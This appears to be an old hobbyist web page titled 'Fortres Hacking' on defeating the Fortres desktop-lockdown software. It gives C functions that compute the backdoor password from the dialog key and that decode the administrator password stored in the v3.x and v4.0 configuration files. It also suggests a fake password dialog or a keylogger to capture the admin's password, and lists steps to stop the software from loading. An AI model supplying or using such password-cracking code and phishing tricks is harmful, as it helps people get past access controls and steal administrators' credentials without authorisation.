Fortres Hacking



Getting into the Configuration Dialog

1. Backdoor Method

Fortres has an option to provide a backdoor key in case the admin has forgotten the password. This key appears as a number in the title bar of the password dialog. If the number begins with "5-" then you are using a version of Fortres I haven't cracked yet. Normally the admin would call up tech support or something and they would use the backdoor key to calculate the backdoor password, which the admin would then use in place of the actual password. At least that's what I've heard. In practice, I have found that this supposedly random key is actually based on the system clock. This little snippet of code will derive the backdoor password for you.

// key - the backdoor key shown in the title bar of the password dialog
// The return value is the backdoor password
// Note: the intermediate arithmetic deliberately overflows a 16-bit signed
// short, so the result relies on two's-complement wrap-around; a key of 0
// yields the password 81.
unsigned short backdoor_password( unsigned long key )
{
   short x;

   x = ((short)( key * -1.2456 ) + 1 ) * 65533;
   x = ( x / 2 + 7 ) * 3;
   x /= 2;
   return x * x;
}

Great help that is, huh? Well, fortunately we have the facility of CGI scripts!


2. Reading the Configuration File

So the backdoor option is not enabled? Then you will have to grab the configuration file and decode its contents.

Fortres v3.x

Under the default install, Fortres v3.x saves the password in a configuration file named DEFAULT.FG3 in the path C:\FORTRES.101\. I took the initiative to reverse engineer Fortres v3.x to figure out how to get the password out of this file. I got myself a disassembler and a book on assembly and started cracking. It didn't take long to find the bit of code that performed the decoding but rewriting it into C was a new challenge for me. It took about a year of working off and on to finally reduce it to these two simple functions.

#include <stdio.h>

// Rotate an 8-bit value left by pos bits (pos is reduced modulo 8)
unsigned char rotl( unsigned char x, unsigned long pos )
{
   pos %= 8;
   return (unsigned char)( ( x << pos ) | ( x >> ( 8 - pos ) ) );
}

// fd - an open stream on DEFAULT.FG3 (the function seeks to the right offset)
// password - a pointer to a buffer to be filled with the password
// len - the length of the buffer pointed to by password
// Returns 0 if the password was successfully deciphered, -1 otherwise
int fortres3( FILE *fd, char *password, unsigned long len )
{
   unsigned long i, j;
   unsigned char buff[648], key[103];

   if( len == 0 )
      return -1;
   // The 103-byte key is stored at offset 234 and is immediately followed
   // by the 648-byte obfuscated block that contains the password
   if( fseek( fd, 234, SEEK_SET ) != 0 )
      return -1;
   if( fread( key, 1, 103, fd ) != 103 )
      return -1;
   if( fread( buff, 1, 648, fd ) != 648 )
      return -1;
   // Undo the rotate/XOR obfuscation byte by byte, cycling through the key
   for( i = 0, j = 0; i < 648; i++ )
      buff[i] = rotl((unsigned char)( rotl( buff[i], i ) ^ key[j = ( j + 1 ) % 103] ), i ) ^ 0xB2;
   // Four bytes of the password field are kept elsewhere in the block
   buff[16] = buff[97];
   buff[18] = buff[109];
   buff[20] = buff[73];
   buff[21] = buff[57];
   // The password starts at offset 16, stored 0x1B below its real value,
   // and is terminated by the letter 'C'
   for( i = 0; i < len && i + 16 < 648 && buff[i + 16]; i++ )
      password[i] = buff[i + 16] + 0x1B;
   if( i == 0 || password[i - 1] != 'C' )
      return -1;
   password[i - 1] = '\0';
   return 0;
}

Fortres v4.0

Tom Mecrow discovered that if backdoor passwords are disabled in 4.0 you might just be able to type "81" (the backdoor password for a key of "0") and get in. I haven't verified this or tested it on other versions. Under the default install, Fortres v4.0 saves the password in a configuration file named APPMGR.SET in the path C:\FGC\. I took the same initiative as I did with 3.x, but to no avail. Later I found this very informative page http://packetstormsecurity.nl/0004-exploits/Fortres4-analysis.txt where there was some BASIC code to decode the password. If you prefer C (I know I do), here you are.

#include <ctype.h>
#include <stdio.h>

// fd - an open stream positioned at the start of APPMGR.SET
// password - a pointer to a buffer to be filled with the password
// len - the length of the buffer pointed to by password
// Returns 0 if the password was successfully deciphered, -1 if the file
// could not be read
int fortres4( FILE *fd, char *password, unsigned long len )
{
   unsigned long i, j;
   unsigned char buff[455];

   if( len == 0 )
      return -1;
   if( fread( buff, 1, 455, fd ) != 455 )
      return -1;
   // Every 18th byte from offset 4 holds one password character, masked with
   // a byte taken from the end of the file plus a position-dependent offset
   for( i = 0, j = 4; i < len - 1 && j < 455; i++, j += 18 )
   {
      password[i] = (char)( buff[j] - buff[454 - i] + i * 3 );
      // The stored password is upper case: stop at the first lower-case
      // letter or non-printable byte (cast avoids passing a negative char
      // to the ctype functions)
      if( ( isalpha( (unsigned char)password[i] ) && !isupper( (unsigned char)password[i] ) )
          || !isprint( (unsigned char)password[i] ) )
         break;
   }
   password[i] = '\0';
   return 0;
}

Here comes the CGI again!


3. Trickery

A less sophisticated way (meaning I didn't have to write any code) is simply to trick the admin into telling you the password. A very creative friend of mine *cough*MIKE*cough* found that creating a fake Fortres password and configuration dialog was a very effective way of tricking the admin. The fake password dialog would save the password typed in by the admin to a file and then display a fake configuration dialog (whether the password was correct or not) where only a few controls worked. A similar method would be to just install a keylogger.

Stop Fortres from Loading

  1. Find a way to unload Fortres: boot from floppy, reboot in DOS mode, etc.
  2. Edit out anything in AUTOEXEC.BAT and CONFIG.SYS that looks like it was put there by Fortres.
  3. Reboot.

Of course, this will only work for machines running Microsoft Windows 95/98/ME. I didn't have much access to NT/2K machines when I was fighting Fortres, so I will need some feedback from anyone who has experience.

Software

DeFortres is the GUI version of all this code. See the Software page.
